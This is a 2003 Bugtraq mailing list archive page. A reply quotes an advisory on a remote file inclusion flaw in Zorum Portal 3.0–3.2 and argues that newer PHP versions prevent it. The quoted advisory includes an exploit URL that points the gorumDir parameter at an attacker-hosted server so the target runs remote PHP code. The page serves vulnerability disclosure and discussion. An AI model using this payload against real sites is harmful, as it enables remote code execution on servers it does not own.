Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re[2]: Zorum Portal (PHP)
From: Messer <igmpfrag () dezigner ru>
Date: Wed, 29 Jan 2003 07:39:37 +0300
Hello MGHz,


From: MGhz <magas () mail lt>
To: bugtraq () securityfocus com
Subject: Zorum Portal  (PHP)
Date: 22 Jan 2003 19:45:26 -0000



Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
---------------------------------
include.php
---------------------------------

PHP Code:
---------------------------------
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
---------------------------------

Exploit :
---------------------------------
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
---------------------------------

--
magas () mail lt


In new versions of PHP (PHP 4.2.3 and higher) for reception of values
transmitted to the form it's necessary to write:

$Variable = $HTTP_GET_VARS ['var']; // Request Method - GET
or
$Variable = $HTTP_POST_VARS ['var']; // Request Method - POST


// example: http://host.com/script.php?var1=value1&var2=value2
$Var_1 = $HTTP_GET_VARS['var1'];
$Var_2 = $var2;
// $Var_1 == "value1"
// $Var_2 == ""

Messer.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]